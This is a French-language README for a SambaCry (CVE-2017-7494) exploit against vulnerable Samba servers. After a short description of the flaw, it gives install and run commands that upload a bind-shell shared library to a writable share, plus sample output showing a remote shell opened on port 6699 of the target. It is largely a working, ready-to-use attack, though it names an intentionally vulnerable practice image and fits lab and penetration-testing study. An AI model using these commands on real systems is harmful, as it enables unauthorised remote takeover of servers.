
SambaCry exploit (CVE-2017-7494)
Samba est une réimplémentation libre du protocole réseau SMB/CIFS. Samba fournit des services de fichiers et d'impression pour divers clients Microsoft Windows et peut s'intégrer à un domaine Microsoft Windows Server, en tant que contrôleur de domaine (DC) ou membre du domaine. Depuis la version 4, il prend en charge les domaines Active Directory et Microsoft Windows NT.
Samba dans la version 4.5.9 et les versions antérieures est vulnérable à une vulnérabilité d'exécution de code à distance nommée SambaCry. CVE-2017-7494 permet aux utilisateurs authentifiés à distance de télécharger une bibliothèque partagée dans un dossier partagé accessible en écriture, et d'effectuer des attaques d'exécution de code pour prendre le contrôle des serveurs qui hébergent des services Samba vulnérables.
Samba 3.x après 3.5.0 et 4.x avant 4.4.14, 4.5.x avant 4.5.10, et 4.6.x avant 4.6.4 ne restreint pas le chemin du fichier lors de l'utilisation de pipes nommés Windows, ce qui permet aux utilisateurs authentifiés à distance de télécharger une bibliothèque partagée dans un dossier partagé accessible en écriture, et d'exécuter du code arbitraire via un pipe nommé conçu.
Utilisez poetry pour configurer l'environnement pour cet exploit
pip3 install -r requirements.txt
Ensuite, vous pouvez l'exécuter comme suit :
./exploit -t <target> -e libbindshell-samba.so \
-s <share> -r <location>/libbindshell-samba.so \
-u <user> -p <password> -P 6699
Par exemple, si vous utilisez l'image vulnérable de vulnerables/cve-2017-7494 et souhaitez exécuter cet exploit contre celle-ci :
./exploit -t <target> -e libbindshell-samba.so \
-s data -r /data/libbindshell-samba.so \
-u sambacry -p nosambanocry -P 6699
Et vous obtiendrez la sortie suivante
./exploit -t <target> -e libbindshell-samba.so \
-s data -r /data/libbindshell-samba.so \
-u sambacry -p nosambanocry -P 6699
[*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699
[+] Veryfying your shell...
Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux
>>
La charge utile de ce projet, ainsi que le code, ont été fortement inspirés par opsxcq/exploit-CVE-2017-7494.